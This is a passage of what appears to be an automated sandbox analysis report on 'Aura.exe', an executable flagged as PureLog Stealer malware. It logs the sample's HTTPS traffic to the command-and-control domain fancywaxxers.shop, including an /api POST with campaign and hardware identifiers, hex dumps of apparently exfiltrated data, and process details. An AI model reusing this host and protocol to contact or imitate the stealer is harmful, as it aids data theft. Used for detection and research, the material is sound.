2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 82 6f 67 3e 4e 39 74 ae b4 c0 c0 ee 94 d0 e6 35 35 06 d8 9e 46 75 57 42 d6 13 f6 c4 e1 c6 da 41 39 56 77 a1 dc ed e9 e8 88 24 35 60 03 8f f2 d3 e6 ce 93 03 99 4d 02 1c c8 21 dd c0 57 0f e3 68 62 8c a7 d2 e8 d2 2b 3c 6e 2a d5 c9 a9 fc e0 e0 d1 73 68 12 1f b2 77 2f e8 d4 06 08 08 c1 40 e0 ed 53 6f 8a ff ef 17 60 14 4e e0 32 db cf 90 fa cb 48 74 c5 01 e9 a4 32 c5 28 96 8c 86 01 a5 db 40 23 49 6a 99 13 d4 91 64 59 96 c3 aa a5 00 b8 89 ac 68 db ee c3 82 d2 1f 4e 1c 19 83 f0 e1 03 57 8c 63 4d a5 ff f2 0d c7 e6 cd 41 bd 41 be 36 3f 2c ba e4 76 8a f8 97 ae c9 5f cf fb 0b 95 e9 f1 ff e2 7f 2c 7e 75 7b 87 50 45 01 1b d4 d5 56 bd 69 96 42 7e e3 7d 8e 9e e1 81 7f 28 31 cf 22 17 a3 48 d2 e1 9e 9a d1 61 b8 31 59 17 4a 22 50 db 7c ef 4b 82 eb 47 69 07 d0 67 06 3d db 84 Data Ascii: og>N9t55FuWBA9Vw$5`M!Whb+<n*shw/@So`N2Ht2(@#IjdYhNWcMAA6?,v_,~u{PEViB~}(1"Ha1YJ"P\|KGig=
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: f1 af 82 97 81 27 d9 b3 39 5d 70 fb 80 5a 8e d7 2a 4a 88 9f 45 69 a3 43 f0 2c 86 6b 02 cb bc 1a b4 54 bd 47 9a 10 f0 92 d0 d4 e7 0e a8 05 01 a0 27 06 e9 99 06 96 72 8e 83 b5 b2 df 7a d0 93 cf d5 a6 be c7 57 7f 8e a7 c4 dd 55 68 de 38 27 ae 07 a6 f0 54 7b 2b 3e da c3 b6 0f 2e 14 b3 8c db f8 c0 d4 ca dd bd 9b ce 52 c8 a1 49 88 da 2d 0b 2a ee 71 56 03 80 79 20 36 f5 83 a8 50 f4 f3 d4 df 0e 93 9b eb fd 21 03 87 c0 f5 2f 27 d2 ba 5e fb ce 2f ec ba 17 bc fa 6a 58 b9 33 4e 2b 78 3f c3 00 04 e3 d2 e4 a9 f2 c4 b4 47 9b af ce 5c 94 b0 b4 76 bc 59 2b 7a b8 26 e4 cc 09 9c ca eb 95 e1 4f e1 56 70 64 d9 d6 cf 8f 7f 8e 61 e0 3f b0 fb 36 a0 d8 e0 a9 6a 3c 27 3e e8 81 cb b8 9e 83 ca a8 39 a7 70 32 a7 9e 1b 7c f6 60 8d 17 a8 60 95 bd 78 c5 6a 08 95 c3 aa 40 66 0f 56 86 0b Data Ascii: '9]pZJEiC,kTG'rzWUh8'T{+>.RI-qVy 6P!/'^/jX3N+x?G\vY+z&OVpda?6j<'>9p2\|``xj@fV
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 26 cd 0d 01 68 cc f9 9f 28 9b d5 e6 1d 81 7f 3c d9 e9 5d 77 eb 36 52 64 cf 5c dd cb 5a a3 90 0f c3 a9 a1 d5 22 13 83 c3 5d 08 67 28 cd 48 e7 f8 ae 18 56 ad 68 f3 54 2e 67 99 46 c6 62 c6 2a 63 65 e4 47 43 a4 65 a6 37 c6 36 f3 80 9a 9f ca 2a 52 72 ec f6 8b 28 04 85 fb a0 4c 87 b0 d0 42 f7 fa 75 54 cf 7f 9e d4 fb 0b 4d 57 23 7a 54 eb 9b 0f c7 27 1a 1d 87 8d b3 ad 36 49 2d a2 99 4e b1 42 4d 0b fd 56 e1 a5 1b b6 bb a0 62 90 f8 b2 b9 73 17 a8 08 6c e8 bb f5 e7 d3 95 6f df 45 0f fd 8b 91 0f 52 2b 65 b3 e8 4f e8 0b 95 aa a5 9b af 03 ff b5 65 ad 3c ff d6 46 66 ad 8e 2f a4 0e a6 30 e6 32 08 e7 42 56 c6 52 f7 90 37 1d c8 ba 7b 29 6e 9e 80 44 56 f2 66 43 08 dd 03 b4 be 19 2f 7d 10 f4 13 49 29 78 f2 95 23 aa 24 76 51 ad ab 81 1b 0e e4 3d b8 29 d8 e1 0d c1 1b a5 8b c1 Data Ascii: &h(<]w6Rd\Z"]g(HVhT.gFbceGCe76Rr(LBuTMW#zT'6I-NBMVbsloER+eOe<Ff/02BVR7{)nDVfC/}I)x#$vQ=)
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: b5 d0 c3 6b 2e 44 3b bd 76 0a d2 46 83 2d b9 da 32 89 5e 51 cb 8c b4 78 2f c4 f4 82 3d aa 47 3c 78 cf 1d b6 d0 1a b4 db 53 30 c6 90 aa fd 6e 36 11 d7 a6 b9 d1 27 91 17 47 5d a9 f2 41 f7 bd 20 6b ee ce 5e 5c 77 12 fe 73 25 c9 c4 14 83 37 e9 96 eb 0b e6 9e 05 5c e9 9d d7 77 2c c8 11 f9 21 63 13 7c ab 0a 0e c5 38 f4 df 03 d3 82 dc 32 a4 8f 40 5a ce 47 bd 44 f7 84 b6 3e 27 23 43 8e d1 70 e4 56 ce b2 c1 c8 4d 14 ec 72 e6 f0 a9 19 16 bd 36 c1 0b 1b 5e 0d da a4 5a bb 72 64 5b ef 30 d7 87 74 0a f5 98 8d 03 b2 cd fe 83 b5 7f b7 6c 13 f3 37 8d d9 fa f0 91 87 95 2a 5e 4b 8b 6e 09 de 9b ad ad 9b 3f e5 5c 8f d3 7f ff d5 51 43 e1 8f bb 15 1d df b4 d4 94 8e af 13 3a 15 69 c2 07 cc d8 17 ae 6e 95 6f 6d d9 8e 8e d9 6e 0c 4e 96 8d 92 6f 3d bd 31 60 bb c4 f6 ee be 5e de 72 Data Ascii: k.D;vF-2^Qx/=G<xS0n6'G]A k^\ws%7\w,!c\|82@ZGD>'#CpVMr6^Zrd[0tl7*^Kn?\QC:inomnNo=1`^r
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: bc 99 70 ec da b1 8f 02 6d 1e 49 9c c7 cd 95 01 cb 27 49 77 85 69 8e db 27 94 37 08 a1 2c ce 89 72 bf 19 92 7e b2 11 f4 6c 37 0e ec 1e 4e b3 ce fc a6 88 56 0d 2a fc 2b 03 0d bf 6d 95 b4 b5 e1 d9 98 dc 28 cc ad ea 08 1e a8 a5 6f 9d 4d 3c 6e f1 f0 cb d5 a2 b7 bf 3f 6d 7d 9a 43 4b f6 fc 11 bc f8 59 33 34 cf 43 6c 90 96 4e bb d7 23 3b 9b 1a 06 61 eb c5 9d 91 ab 2a 8b d9 4e eb a6 67 3b 87 2f 3e f9 e1 e8 f1 be ef 6d 86 b5 ee e2 b1 b3 db 67 0b 51 3e e3 f3 9f d4 df bd 47 8b 44 52 db c3 ab 52 79 80 c1 d0 d9 b5 c2 3b 9d 2d 17 6d 5e 77 71 51 c7 35 90 cf 8e 7b 7d 4b 70 3a ce 64 0e 38 ff 8e f1 90 f1 e1 03 ee 7f ba 3f fc 23 05 a7 ea 80 43 42 f9 9c 93 df 4c 69 16 10 39 5b 1b 7e cf 42 85 cf 9d 20 d9 6f 4f 23 8a 0a 7b 2f 15 16 d2 0c 48 8d 4e 27 99 c7 76 f1 71 b0 4c 7f 79 Data Ascii: pmI'Iwi'7,r~l7NV+m(oM<n?m}CKY34ClN#;aNg;/>mgQ>GDRRy;-m^wqQ5{}Kp:d8?#CBLi9[~B oO#{/HN'vqLy
2025-01-05 18:37:04 UTC	15331	OUT	Data Raw: 33 d8 12 79 94 5d 3c a6 4e b9 6d 60 ac ee 21 16 42 04 d5 4d 0a 05 3c 56 31 af 1f 49 da 54 ea 89 de df cb 2c c3 de 6d 36 26 3d 58 cc 0b 69 97 71 0c 9e 97 45 2c 5a 63 6d 88 9c f3 55 17 36 2b 77 c4 4b 54 3a 76 a0 dd bb 6a 0b 8b 56 9c 7e 0c 3d d1 2b 4e aa a1 3e ee 33 26 62 44 ab 18 df b3 3a e9 97 e8 76 ad 81 6f cf 15 2d 94 eb 29 69 ea 0f 1d d7 f3 3f f2 01 d7 91 7d 2f c6 c3 0e 65 bb f0 e4 78 f8 ef d6 8d c0 43 ef b7 ec 3e 9e d7 5d 41 ab e9 4f 14 0d fc 3a d1 a9 f1 92 fe 21 34 a3 e8 96 93 d3 44 27 7d 6d 22 63 da c9 cb d5 29 f8 20 ae fb 82 6f 55 f0 bb f5 27 2e 15 d3 fe 06 af 0c ca 6b df 73 0e cc 33 57 b9 0f 33 f5 ad f1 dd 1f 29 1e f5 53 ad 01 6b 69 e3 5d 95 cc 58 1b d6 49 4b b3 f3 96 9e ea 4b 1d 99 23 3a 2d fb 06 30 53 85 a5 42 35 81 fb f7 64 1c d9 69 33 70 c9 3a Data Ascii: 3y]<Nm`!BM<V1IT,m6&=XiqE,ZcmU6+wKT:vjV~=+N>3&bD:vo-)i?}/exC>]AO:!4D'}m"c) oU'.ks3W3)Ski]XIKK#:-0SB5di3p:
2025-01-05 18:37:06 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:37:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uogk0cfk659h2a8ig64l16m99p; expires=Thu, 01 May 2025 12:23:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lO2gxzVvaeVhN3Qje%2Fe3mD8NwnXXbjPdoOu3KWcN9jJbqO8WU3JDc%2FWbhRayrXYD7BoamwJYkj0qmb3G6bZo0Ps38rVYrpN1bQqTICKK7fKbe56jmQQOsshwUN5FdKwAFViwRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593d53e897d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2036&min_rtt=2029&rtt_var=776&sent=202&recv=604&lost=0&retrans=0&sent_bytes=2842&recv_bytes=590454&delivery_rate=1395793&cwnd=244&unsent_bytes=0&cid=c8c4954e9429f9dd&ts=2226&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49750	104.21.80.1	443	7328	C:\Users\user\Desktop\Aura.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:37:06 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: fancywaxxers.shop
2025-01-05 18:37:06 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 68 69 74 6f 6b 34 31 31 31 26 6a 3d 26 68 77 69 64 3d 33 45 44 38 42 36 45 43 38 46 41 46 32 34 38 44 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@hitok4111&j=&hwid=3ED8B6EC8FAF248D09E39FEBDE2EA801
2025-01-05 18:37:07 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:37:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2ktv8hfoimdacj6g679e3llq7n; expires=Thu, 01 May 2025 12:23:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2IftbkOz5ujC9UrLBKW9MaUopbuG3nKblSN1Hf6sgFLHIy%2BsQcHHXMDKe1JD5nVqkFBQVtR1jebaBiOuXAAhyj%2F4VmS8kWdyhXsG31zQOYKFziNtDt6cKzy58SxqWZ5kv40NA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd593e628698c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1988&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=988&delivery_rate=1454183&cwnd=223&unsent_bytes=0&cid=271c09886089ac27&ts=516&x=0"
2025-01-05 18:37:07 UTC	242	IN	Data Raw: 33 36 39 30 0d 0a 4e 35 45 49 4a 2f 6d 35 51 5a 31 54 33 42 78 48 47 37 50 44 44 4a 53 45 6e 69 7a 4c 4c 37 45 2f 46 59 55 2f 5a 62 42 76 6e 63 5a 73 36 69 70 53 32 34 4e 6a 39 53 65 6f 62 48 31 48 6e 4a 38 6a 70 62 43 70 41 76 38 61 6e 77 73 69 71 77 64 55 37 45 44 2b 71 56 6e 35 5a 31 53 4e 6c 79 54 6c 4e 76 34 77 5a 58 33 48 34 54 61 6b 71 4c 78 4a 36 52 57 42 51 6a 6e 2b 48 51 50 45 54 61 66 33 47 37 4e 74 42 63 4f 49 62 62 38 33 2f 69 5a 6c 4b 76 2f 33 65 38 54 4a 33 33 61 49 46 34 68 51 63 76 46 79 4a 38 6f 61 70 4a 56 55 31 54 39 2b 72 65 30 54 79 47 53 37 55 69 4e 51 2b 71 68 37 77 2b 66 76 58 4b 42 64 33 47 55 67 77 46 68 64 78 7a 33 32 69 6b 32 6a 63 57 54 4a 7a 67 6e 53 5a 4f 31 57 4d 45 76 48 71 30 4c 61 Data Ascii: 3690N5EIJ/m5QZ1T3BxHG7PDDJSEnizLL7E/FYU/ZbBvncZs6ipS24Nj9SeobH1HnJ8jpbCpAv8anwsiqwdU7ED+qVn5Z1SNlyTlNv4wZX3H4TakqLxJ6RWBQjn+HQPETaf3G7NtBcOIbb83/iZlKv/3e8TJ33aIF4hQcvFyJ8oapJVU1T9+re0TyGS7UiNQ+qh7w+fvXKBd3GUgwFhdxz32ik2jcWTJzgnSZO1WMEvHq0La
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 77 73 70 5a 69 68 36 41 55 48 7a 52 66 54 2f 4a 48 76 43 56 51 76 56 62 44 4c 54 39 4f 39 77 55 6a 57 6f 58 65 76 71 50 57 4e 58 6e 71 56 71 65 51 66 41 55 4a 38 41 50 56 65 59 67 71 59 4a 76 77 6d 46 74 74 50 38 73 35 43 4b 47 56 33 49 70 77 6f 52 48 32 66 66 64 57 49 70 49 2b 33 56 61 38 58 55 72 38 56 65 70 67 58 44 58 62 56 57 62 37 42 44 77 4e 49 74 4e 4d 55 6a 57 6b 6c 33 62 39 65 68 6b 6c 77 44 2f 58 6e 4c 72 55 79 2f 71 57 39 71 79 48 50 35 64 54 59 76 50 45 74 6f 59 73 31 30 42 53 75 62 30 62 2b 54 52 78 6c 36 41 62 6f 41 4f 49 66 39 37 4a 2b 6f 48 37 4b 39 67 35 47 31 6a 72 75 34 48 36 78 4b 62 54 54 46 4c 30 6f 70 41 77 4d 58 4e 47 37 31 36 39 33 6f 6b 74 32 6f 6f 67 44 6e 4e 38 6e 50 4a 57 30 36 39 39 41 66 7a 47 4b 31 47 44 43 36 43 69 44 6a Data Ascii: wspZih6AUHzRfT/JHvCVQvVbDLT9O9wUjWoXevqPWNXnqVqeQfAUJ8APVeYgqYJvwmFttP8s5CKGV3IpwoRH2ffdWIpI+3Va8XUr8VepgXDXbVWb7BDwNItNMUjWkl3b9ehklwD/XnLrUy/qW9qyHP5dTYvPEtoYs10BSub0b+TRxl6AboAOIf97J+oH7K9g5G1jru4H6xKbTTFL0opAwMXNG71693okt2oogDnN8nPJW0699AfzGK1GDC6CiDj
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 4c 35 75 67 41 39 36 37 47 73 6e 36 68 62 73 71 32 54 6b 62 48 54 53 39 41 58 6e 45 70 74 4e 4d 55 76 53 69 6b 44 41 78 66 30 62 76 58 72 66 66 6a 36 33 65 6c 57 41 4f 64 4c 79 63 38 6c 62 54 72 50 30 42 2f 4d 59 72 55 59 4d 4c 6f 4b 50 4f 4f 50 55 30 32 32 52 62 49 6b 47 65 75 4a 4c 4b 50 49 56 36 50 39 6b 38 6b 77 51 6f 4f 30 56 7a 77 62 72 65 77 6c 2f 2b 49 70 6e 34 39 50 39 58 62 74 45 77 31 46 41 38 31 55 6b 69 42 6a 66 72 58 76 72 4f 6b 36 36 69 54 62 56 48 4f 73 74 44 57 7a 6a 74 32 54 61 79 74 68 34 76 6d 36 41 44 33 72 73 61 79 66 71 46 75 79 72 5a 4f 52 73 64 4e 4c 30 42 65 63 53 6d 30 30 78 53 39 4b 4b 51 4d 44 46 2f 52 75 39 65 74 39 2b 50 72 64 36 56 59 41 35 30 76 4a 7a 79 56 74 4f 73 2f 51 48 38 78 69 74 52 67 77 75 67 6f 38 34 34 39 54 54 Data Ascii: L5ugA967Gsn6hbsq2TkbHTS9AXnEptNMUvSikDAxf0bvXrffj63elWAOdLyc8lbTrP0B/MYrUYMLoKPOOPU022RbIkGeuJLKPIV6P9k8kwQoO0Vzwbrewl/+Ipn49P9XbtEw1FA81UkiBjfrXvrOk66iTbVHOstDWzjt2Tayth4vm6AD3rsayfqFuyrZORsdNL0BecSm00xS9KKQMDF/Ru9et9+Prd6VYA50vJzyVtOs/QH8xitRgwugo8449TT
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 4e 33 52 2f 63 47 44 2b 45 69 31 34 6c 30 34 6d 42 6a 6a 50 77 79 2b 33 69 78 61 68 35 6f 69 35 64 57 30 75 76 70 53 36 70 6d 2f 57 74 52 36 31 51 67 2f 6a 2f 4e 67 46 7a 45 51 31 43 50 33 48 58 5a 43 37 31 6f 64 33 33 4b 74 45 62 64 77 76 4a 39 6f 78 2f 35 62 32 4c 5a 45 42 48 45 49 36 57 77 58 61 42 2b 52 4c 50 4d 44 4e 73 33 70 43 38 47 64 73 53 4c 57 39 48 65 70 32 69 75 48 2f 68 79 53 61 6f 4e 4f 5a 39 65 79 71 52 69 79 31 4a 37 31 6f 31 71 72 42 62 70 62 6a 30 71 35 4b 42 4e 76 2f 4b 71 56 49 35 68 39 6b 64 36 30 33 67 41 78 46 6d 75 39 6e 50 66 4d 46 32 64 79 6d 72 77 4b 34 34 71 48 6c 58 35 6c 58 6e 68 34 61 64 6f 2f 33 37 35 66 69 50 71 57 42 62 73 51 50 65 41 58 74 51 77 44 4d 72 36 65 61 6f 65 69 47 6b 41 57 64 79 6e 56 71 62 2b 70 30 4f 48 59 Data Ascii: N3R/cGD+Ei14l04mBjjPwy+3ixah5oi5dW0uvpS6pm/WtR61Qg/j/NgFzEQ1CP3HXZC71od33KtEbdwvJ9ox/5b2LZEBHEI6WwXaB+RLPMDNs3pC8GdsSLW9Hep2iuH/hySaoNOZ9eyqRiy1J71o1qrBbpbj0q5KBNv/KqVI5h9kd603gAxFmu9nPfMF2dymrwK44qHlX5lXnh4ado/375fiPqWBbsQPeAXtQwDMr6eaoeiGkAWdynVqb+p0OHY
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 33 42 67 50 55 48 39 36 6c 62 75 74 67 64 5a 61 4c 45 50 41 42 6e 6b 5a 31 61 74 47 62 62 2f 44 33 31 47 32 64 58 2f 63 49 4a 72 41 4d 55 75 59 43 38 4b 64 76 39 33 68 45 6c 2f 67 30 36 79 57 53 53 78 46 63 35 61 56 70 78 2f 50 66 47 71 64 4e 35 77 68 50 7a 67 70 58 78 77 54 6b 6b 56 7a 4a 55 6d 57 38 7a 44 58 36 61 70 46 65 45 30 69 43 6b 6c 43 37 30 73 52 43 73 33 2f 68 5a 31 7a 57 63 6c 4c 42 58 4d 79 33 59 66 35 6b 64 62 7a 68 4b 38 6f 65 37 33 30 44 53 4e 61 36 52 64 58 76 39 45 65 65 66 39 39 71 49 63 64 34 41 4f 63 67 32 71 39 43 77 32 35 55 76 66 73 72 36 6a 75 79 53 77 31 34 77 75 68 31 34 65 66 4e 56 4b 39 4a 35 57 39 6e 37 30 34 56 68 7a 66 4f 71 30 50 45 65 78 65 68 33 78 50 73 59 35 6b 73 64 79 6e 53 38 6c 43 37 74 64 6c 56 76 32 44 2b 63 6c Data Ascii: 3BgPUH96lbutgdZaLEPABnkZ1atGbb/D31G2dX/cIJrAMUuYC8Kdv93hEl/g06yWSSxFc5aVpx/PfGqdN5whPzgpXxwTkkVzJUmW8zDX6apFeE0iCklC70sRCs3/hZ1zWclLBXMy3Yf5kdbzhK8oe730DSNa6RdXv9Eeef99qIcd4AOcg2q9Cw25Uvfsr6juySw14wuh14efNVK9J5W9n704VhzfOq0PEexeh3xPsY5ksdynS8lC7tdlVv2D+cl
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 34 67 37 56 37 58 47 6e 58 58 65 50 2f 48 58 54 45 61 56 72 46 48 37 4b 74 6c 33 43 31 76 64 64 6e 46 33 53 52 6d 58 53 62 43 4f 42 48 4d 2b 76 52 4b 67 77 52 72 66 7a 64 63 51 30 37 6e 38 6f 4b 75 48 32 64 74 58 56 37 45 2f 34 62 76 73 49 57 63 6b 4d 4f 5a 38 69 30 61 52 6b 2b 46 4a 78 6c 64 73 58 71 67 6d 58 4b 54 52 78 67 6f 35 4b 72 4d 33 45 52 4c 70 6c 77 41 5a 73 35 48 77 6f 68 78 7a 77 6b 57 61 70 55 57 7a 49 38 44 6a 30 46 49 70 6d 44 53 37 53 38 31 76 33 39 65 35 48 75 55 4c 49 62 30 44 79 43 51 6e 79 41 74 71 73 42 65 4d 37 62 5a 62 44 41 75 6f 43 6c 58 49 6c 59 66 65 4c 51 63 4c 51 36 30 75 42 52 4e 6f 4d 55 73 68 76 4c 4e 6f 31 37 4a 52 65 34 6a 45 65 76 66 73 48 72 77 4b 4f 4b 52 31 51 36 62 4e 4e 32 62 50 6f 65 61 55 57 68 33 78 32 31 46 67 Data Ascii: 4g7V7XGnXXeP/HXTEaVrFH7Ktl3C1vddnF3SRmXSbCOBHM+vRKgwRrfzdcQ07n8oKuH2dtXV7E/4bvsIWckMOZ8i0aRk+FJxldsXqgmXKTRxgo5KrM3ERLplwAZs5HwohxzwkWapUWzI8Dj0FIpmDS7S81v39e5HuULIb0DyCQnyAtqsBeM7bZbDAuoClXIlYfeLQcLQ60uBRNoMUshvLNo17JRe4jEevfsHrwKOKR1Q6bNN2bPoeaUWh3x21Fg
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 4c 78 5a 71 57 4a 33 76 34 73 30 39 51 61 51 63 6e 56 49 31 2f 70 34 6f 4e 50 37 53 4a 31 59 2b 58 41 69 74 48 55 53 35 79 6e 6f 39 56 4c 43 54 48 4b 39 39 6a 47 32 4f 75 74 54 49 57 4c 2b 2b 31 54 31 73 74 68 39 76 6b 6e 41 55 6e 4f 33 44 41 33 71 57 71 79 65 64 76 49 2f 55 61 7a 58 41 38 51 45 36 30 30 50 55 75 4f 53 51 61 4c 70 2f 32 43 34 47 75 30 51 58 50 39 48 41 63 63 41 79 34 4a 74 33 30 56 69 6f 2f 70 33 38 54 32 79 53 69 52 5a 79 62 59 31 78 2b 66 53 59 35 78 73 30 31 52 65 73 6e 4d 4a 69 43 54 55 72 55 44 69 65 32 69 55 30 79 50 78 43 37 70 49 44 53 6e 48 68 55 48 52 34 64 68 68 6d 31 6e 38 43 58 72 6e 64 46 79 46 4f 39 6d 6b 64 73 59 6a 55 72 44 65 43 74 77 71 39 33 55 66 65 76 32 6d 53 50 6e 70 79 45 69 4a 53 59 46 55 64 37 31 58 4c 73 41 31 Data Ascii: LxZqWJ3v4s09QaQcnVI1/p4oNP7SJ1Y+XAitHUS5yno9VLCTHK99jG2OutTIWL++1T1sth9vknAUnO3DA3qWqyedvI/UazXA8QE600PUuOSQaLp/2C4Gu0QXP9HAccAy4Jt30Vio/p38T2ySiRZybY1x+fSY5xs01ResnMJiCTUrUDie2iU0yPxC7pIDSnHhUHR4dhhm1n8CXrndFyFO9mkdsYjUrDeCtwq93Ufev2mSPnpyEiJSYFUd71XLsA1
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 68 42 56 4e 4c 72 64 4e 67 4c 35 48 41 57 51 64 2b 62 59 73 50 47 71 58 75 76 58 75 42 6a 4f 74 42 37 4e 2f 4d 38 38 50 38 44 34 44 35 65 79 76 56 32 2f 43 57 6b 54 67 4e 36 30 61 74 6b 7a 76 66 78 52 5a 39 72 35 45 56 6b 34 45 30 45 31 42 79 70 72 30 33 72 53 57 43 67 6a 51 62 48 4a 49 5a 2f 42 6c 61 45 74 54 2b 6c 38 2b 6c 41 71 48 58 47 58 45 58 4f 63 44 7a 6a 4b 39 71 31 41 64 56 48 56 35 48 37 46 71 77 66 36 47 73 42 53 74 4b 69 4e 66 43 39 38 47 32 50 54 50 4e 46 59 4c 78 56 46 49 64 66 39 5a 35 69 79 33 70 39 77 64 63 55 71 53 53 75 53 44 5a 4f 2f 62 74 57 77 38 7a 79 53 50 70 31 30 45 39 37 76 45 74 52 35 77 72 35 6b 45 44 5a 52 78 44 49 38 7a 62 51 4d 4c 74 57 43 48 72 72 71 30 6e 38 37 2f 42 4a 68 32 44 6f 63 47 58 48 58 68 2f 30 47 74 58 79 54 Data Ascii: hBVNLrdNgL5HAWQd+bYsPGqXuvXuBjOtB7N/M88P8D4D5eyvV2/CWkTgN60atkzvfxRZ9r5EVk4E0E1Bypr03rSWCgjQbHJIZ/BlaEtT+l8+lAqHXGXEXOcDzjK9q1AdVHV5H7Fqwf6GsBStKiNfC98G2PTPNFYLxVFIdf9Z5iy3p9wdcUqSSuSDZO/btWw8zySPp10E97vEtR5wr5kEDZRxDI8zbQMLtWCHrrq0n87/BJh2DocGXHXh/0GtXyT
2025-01-05 18:37:07 UTC	1369	IN	Data Raw: 4e 32 67 54 42 66 49 56 35 41 30 72 55 39 47 4c 43 34 4d 31 44 70 32 72 6d 58 6d 7a 31 59 30 72 53 41 73 2b 77 58 50 49 77 55 35 48 56 4f 2b 63 71 72 56 38 71 57 76 53 6b 4f 36 58 4f 36 55 2b 2f 53 4d 4a 78 55 74 56 4b 4d 59 46 66 7a 4b 39 68 78 31 4a 37 31 76 49 76 33 79 61 46 65 57 78 4d 35 37 6c 31 30 39 48 61 66 49 46 32 2b 6b 35 55 35 48 63 54 2f 6c 7a 66 69 41 58 54 65 78 65 62 33 48 54 59 43 34 70 31 44 55 48 66 72 6e 76 6c 35 63 6b 5a 76 55 32 45 43 45 58 50 61 6a 2f 69 44 4b 57 79 55 4f 4e 64 5a 5a 66 4d 65 66 41 77 6d 33 6f 65 57 50 65 52 57 66 7a 6c 37 31 37 2f 48 34 6c 6c 63 72 42 64 4a 38 42 64 2b 4c 42 68 39 45 77 54 76 4d 6f 6c 32 44 36 71 4b 68 31 35 68 2f 64 4e 39 62 58 45 54 2f 70 45 39 46 4e 61 35 47 4e 4b 34 77 72 56 39 31 48 53 65 47 Data Ascii: N2gTBfIV5A0rU9GLC4M1Dp2rmXmz1Y0rSAs+wXPIwU5HVO+cqrV8qWvSkO6XO6U+/SMJxUtVKMYFfzK9hx1J71vIv3yaFeWxM57l109HafIF2+k5U5HcT/lzfiAXTexeb3HTYC4p1DUHfrnvl5ckZvU2ECEXPaj/iDKWyUONdZZfMefAwm3oeWPeRWfzl717/H4llcrBdJ8Bd+LBh9EwTvMol2D6qKh15h/dN9bXET/pE9FNa5GNK4wrV91HSeG

Target ID:	0
Start time:	13:36:54
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0xba0000
File size:	378'920 bytes
MD5 hash:	320BF7FBC1C911B3359527BF0EA85FCA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1654453374.0000000000BA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1780798497.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:36:54
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:36:54
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Aura.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Aura.exe"
Imagebase:	0x320000
File size:	378'920 bytes
MD5 hash:	320BF7FBC1C911B3359527BF0EA85FCA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:36:54
Start date:	05/01/2025
